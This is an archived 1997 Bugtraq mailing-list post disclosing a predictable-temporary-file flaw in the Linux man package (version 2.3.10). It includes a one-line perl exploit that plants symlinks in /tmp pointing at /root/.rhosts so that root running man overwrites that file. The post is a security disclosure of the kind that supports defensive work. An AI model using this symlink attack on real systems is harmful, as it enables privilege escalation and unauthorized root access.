man problem

From: Thomas Fischbacher (tfat_private-MUENCHEN.DE)
Date: Wed Dec 24 1997 - 04:25:14 PST

Previous message: Alan Brown: "Re: Crashing an XTACACS authentication server"
Next in thread: d: "Re: man problem"
Reply: d: "Re: man problem"
Reply: fluffyat_private: "Re: man problem"
Reply: Rick Byers: "Re: man problem"
Reply: Olaf Kirch: "Re: man problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Since this is my first posting to bugtraq, so please don't flame me if
this is already known:

I just noticed a problem with the man system (version 2.3.10) on my Linux
box: /usr/man contains the .gz'd man pages:

(from /usr/man/man1:)

-rw-r--r--   1 root     root         1684 Sep 28  1995 cp.1.gz
-rw-r--r--   1 root     root         4063 Dec 29  1995 cpio.1.gz
-rw-r--r--   1 root     root           42 Oct 17  1996 cpp.1.gz

When I execute man, a temporary file containing the un-zipped manpage is
created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
e.g. "zman10849aaa". This can be exploited with a simple symlink attack:

perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'

So when root executes man here and the pid of the man process falls in the
range 8000-11999... you know the rest.

--
     regards,                                               (o_
      Thomas Fischbacher -  tfat_private-muenchen.de        //\
                                                            V_/_

Next message: d: "Re: man problem"
Previous message: Alan Brown: "Re: Crashing an XTACACS authentication server"
Next in thread: d: "Re: man problem"
Reply: d: "Re: man problem"
Reply: fluffyat_private: "Re: man problem"
Reply: Rick Byers: "Re: man problem"
Reply: Olaf Kirch: "Re: man problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:26 PDT